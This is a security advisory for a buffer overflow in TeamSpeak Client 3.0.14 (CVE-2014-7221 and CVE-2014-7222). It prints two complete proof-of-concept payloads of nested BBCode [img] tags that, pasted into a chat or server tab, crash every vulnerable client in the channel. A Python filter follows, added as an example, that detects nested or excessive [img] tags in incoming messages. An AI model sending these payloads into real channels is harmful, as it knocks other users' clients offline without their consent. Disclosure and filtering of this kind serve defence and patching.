TeamSpeak Client 3.0.14 Buffer Overflow
Posted on 07 October 2014
#################################################################################################
#
# Title                  : TeamSpeak Client v3.0.14 - Buffer Overflow Vulnerability
# Severity               : High+/Critical
# Reporter(s)            : SpyEye & Christian Galeone
# Software Version       : 3.0.14 & Previous Versions
# Software Name          : TeamSpeak Client
# Software Download Link : http://letoltes.szoftverbazis.hu/IbAi1W2OLVclvRLS2KUGHw/1410984789/teamspeak-3014/TeamSpeak3-Client-win64-3.0.14.exe
# Vendor Home            : http://teamspeak.com/
# Date(s)                : 01/04/2014 - 0r161n4l c0d3 By SpyEye
#                        : 21/05/2014 - v4r14n7 c0d3 By Christian Galeone
# Tested in              : Win7 - TeamSpeak Client V3.0.14
# CVE(s)                 : CVE-2014-7221 By SpyEye & CVE-2014-7222 By Christian Galeone
#
##################################################################################################
#
# Effects:
#
# Mass Crash Client (You & The User(s) Connected With A Vulnerable Version Into YOUR Channel)
#
# Note:
#
# The Following Code MUST Be Sent Into The Chat/Server Tab For A Channel/Server Crash Effect.
#
# PoC:
#
# 1) Buffer Overflow Vulnerability -
#    0r161n4l c0d3 n.1
#    By SpyEye
#
# CVE: CVE-2014-7221
#
# [img][img]//http://www.teamspeak.com/templates/teamspeak_v3/images/blank.gif[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7a.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7b.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.24[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7z.png?ver=4.6.0.28[/img][/img]
#
# 2) Buffer Overflow Vulnerability -
#    v4r14n7 c0d3 n.2
#    By Christian Galeone
#
# CVE: CVE-2014-7222
#
# [img][img]\1z[/img][/img][img][img]\2z[/img][/img][img][img]\3z[/img][/img][img][img]\4z[/img][/img][img][img]\5z[/img][/img][img][img]\6z[/img][/img][img][img]\7z[/img][/img][img][img]\8z[/img][/img][img][img]\9z[/img][/img][img][img]\10z[/img][/img][img][img]\11z[/img][/img][img][img]\12z[/img][/img][img][img]\13z[/img][/img][img][img]\14z[/img][/img][img][img]\15z[/img][/img][img][img]\16z[/img][/img][img][img]\17z[/img][/img][img][img]\18z[/img][/img][img][img]\1z[/img][/img][img][img]\2z[/img][/img][img][img]\3z[/img][/img][img][img]\4z[/img][/img][img][img]\5z[/img][/img][img][img]\6z[/img][/img][img][img]\7z[/img][/img][img][img]\8z[/img][/img][img][img]\9z[/img][/img][img][img]\10z[/img][/img][img][img]\11z[/img][/img][img][img]\12z[/img][/img][img][img]\13z[/img][/img]
#
# Fix:
#
# http://screech.me/ts3/plugins/antifreeze.html
#
# OR
#
# http://www.teamspeak.com/?page=downloads
#
# Original Source:
#
# http://r4p3.net/public/ts3bbcodefreeze.txt
#
# http://r4p3.net/forum/reverse-engineering/38/teamspeak-3-exploit-bb-code-freeze-crash-not-responding/905/
#
# Credit(s):
#
# SpyEye (http://forum.teamspeak.com/member.php/263635-SpyEye) - 0r161n4l 3xpl017 d3v3l0p3r
#
# Christian Galeone - V4r14n7 3xpl017 d3v3l0p3r
#
##################################################################################################
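
Both PoC strings above are built from `[img]` tags nested inside `[img]` tags, which ordinary chat has no reason to contain. The filter below is an added example, not code from the advisory, the vendor, or the linked plugin: it flags chat messages with nested or excessive `[img]` tags before they are displayed or relayed. The `MAX_IMG_TAGS` limit, the function names and the sample messages are assumptions made for illustration.

```python
import re

# Matches opening and closing [img] BBCode tags, case-insensitively.
IMG_TAG = re.compile(r"\[(/?)img\]", re.IGNORECASE)

MAX_IMG_TAGS = 4  # assumed per-message limit, not a TeamSpeak setting


def img_tag_stats(message):
    """Return (maximum [img] nesting depth, number of opening [img] tags)."""
    depth = max_depth = opens = 0
    for match in IMG_TAG.finditer(message):
        if match.group(1):                 # closing tag: [/img]
            depth = max(depth - 1, 0)      # tolerate stray closers
        else:                              # opening tag: [img]
            depth += 1
            opens += 1
            max_depth = max(max_depth, depth)
    return max_depth, opens


def classify(message):
    """Return a reason string if the message should be dropped, else None."""
    max_depth, opens = img_tag_stats(message)
    if max_depth > 1:
        return "nested [img] tags (depth %d)" % max_depth
    if opens > MAX_IMG_TAGS:
        return "too many [img] tags (%d)" % opens
    return None


# Constructed sample chat lines (sender, text); not captured traffic.
SAMPLE_CHAT = [
    ("alice", "look at this [img]http://example.com/cat.png[/img]"),
    ("mallory", "[img][img]x[/img][/img]"),
    ("bob", "no markup here"),
    ("carol", "[IMG]a[/IMG]" * 5),
]


def scan(chat):
    """Return [(sender, reason)] for every message that would be dropped."""
    flagged = []
    for sender, text in chat:
        reason = classify(text)
        if reason is not None:
            flagged.append((sender, reason))
    return flagged


if __name__ == "__main__":
    for sender, reason in scan(SAMPLE_CHAT):
        print("drop message from %s: %s" % (sender, reason))
```

A filter like this only reduces exposure for clients that cannot be upgraded yet; updating the client, as listed under "Fix", removes the flaw itself.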
